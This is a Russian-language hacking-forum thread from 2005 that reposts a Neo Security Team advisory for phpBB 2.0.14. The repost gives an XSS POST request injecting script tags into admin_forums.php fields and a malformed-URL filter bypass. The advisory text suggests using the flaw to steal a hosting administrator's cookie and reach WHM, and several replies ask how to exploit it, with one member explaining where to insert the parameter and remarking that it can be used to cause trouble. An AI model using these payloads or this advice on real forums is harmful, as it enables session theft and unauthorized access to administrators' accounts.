Форумы Очередные дыры: phpBB 2.0.14

Discussion in 'Уязвимости CMS/форумов' started by rsha1988, 6 May 2005.

  1. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    /*
    ------------------------------------------------------------------------------------------
    [N]eo ecurity [T]eam [NST]® - Advisory #14 - 17/04/05
    --------------------------------------------------------
    Program: phpBB 2.0.14
    Homepage: http://www.phpbb.com
    Vulnerable Versions: phpBB 2.0.14 & Lower versions
    Risk: Low Risk!!
    Impact: Multiple Vulnerabilities.

    -==phpBB 2.0.14 Multiple Vulnerabilities==-
    ------------------------------------------------------------------------------------------

    - Description
    ------------------------------------------------------------------------------------------
    phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS -SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.

    - Tested
    ------------------------------------------------------------------------------------------
    localhost & many forums

    - Explotation
    ------------------------------------------------------------------------------------------
    -==Bad Filter of HTML Code==-
    phpBB2/profile.php?mode=viewprofile&u=\[]phpBB2/viewtopic.php?p=3&highly ht=\[]
    ##############################################
    -==XSS==-
    POST /admin/admin_forums.php?sid=7bd54a5a9861ef180af78897e70HTTP/1.1
    forumname=<script>alert('NST')</script>&forumdesc=<script>alert('NST'</script>&c=1&forumstatus=0&prune_days=7&prune_freq=0&
    prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create
    new
    forum

    Some people cannot find it interest someones yes but well i dontcare because if you put some effort you know that you can do a lot with this, like fooling the Admin of the Hosting to get his cookie & and then get access to whm...

    - References
    ------------------------------------------------------------------------------------------
    http://neosecurityteam.net/Advisories/Advisory-14.txt


    - Credits
    -------------------------------------------------
    Discovered by HaCkZaTaN <hck_zatan hotmail com>

    [N]eo ecurity [T]eam [NST]® - http://neosecurityteam.net/

    Got Questions? http://neosecurityteam.net/

    Irc.gigachat.net #uruguay [NeoSecurity IRC]

    - Greets
    ------------------------------------------------------------------------------------------
    Paisterist
    Daemon21
    LINUX
    erg0t
    uyx
    CrashCool
    Makoki
    KingMetal
    r3v3ng4ns

    And my Colombian people

    @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
    '@@@@@''@@'@@@''''''''@@''@@@''@@
    '@@'@@@@@@''@@@@@@@@@'''''@@@
    '@@'''@@@@'''''''''@@@''''@@@
    @@@@''''@@'@@@@@@@@@@''''@@@@@
    */

    /* EOF */
     
  2. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    как пользоваться?
     
  3. Xalegi

    Xalegi Elder - Старейшина

    Joined:
    24 Nov 2004
    Messages:
    109
    Likes Received:
    4
    Reputations:
    6
    псле знаиния параметра страницы (к примеру ....p=3) нужно вставить &highlight/[]/

    это работает в тех ветках форума, где нужны мудераторские права...
     
  4. Jonathan Allen

    Joined:
    21 Mar 2005
    Messages:
    62
    Likes Received:
    6
    Reputations:
    2
    А по-подробнее нельзя?
     
  5. OLIVER

    OLIVER Elder - Старейшина

    Joined:
    5 Feb 2005
    Messages:
    54
    Likes Received:
    2
    Reputations:
    4
    Xalegi
    Что значит
    И чего мы получим от этой уязвимости?
     
  6. kyzmi4

    kyzmi4 Elder - Старейшина

    Joined:
    19 Jul 2004
    Messages:
    113
    Likes Received:
    35
    Reputations:
    5
    Ничего написанно low risk
     
  7. OLIVER

    OLIVER Elder - Старейшина

    Joined:
    5 Feb 2005
    Messages:
    54
    Likes Received:
    2
    Reputations:
    4
    порпобывал разные варианты ничего не получается (хотя может это из-за того что форум не 14 версии...)

    kyzmi4) а в чём тоды прикол ))
    low risk!!! - интересно а зачем восклицательные знаки?
     
  8. Xalegi

    Xalegi Elder - Старейшина

    Joined:
    24 Nov 2004
    Messages:
    109
    Likes Received:
    4
    Reputations:
    6
    кузмичь.. не уверен =)))
    поднасрать можно хорошо через эту фигню...

    Оливер... это означает, что нужно использовать в тех ветках форумах, где ты можешь смотреть посты, НО ДОБОВЛЯТЬ не можешь... (к примеру "объявления", "Правила форума")...

    потом смотрим на пост и видим присутствие бага... а дальше думаем рябята =) а то вам всё расскажи и покажи.. мож видио появится =)
     
  9. temon

    temon Elder - Старейшина

    Joined:
    6 Feb 2005
    Messages:
    114
    Likes Received:
    4
    Reputations:
    0
    ну сделай видео блин.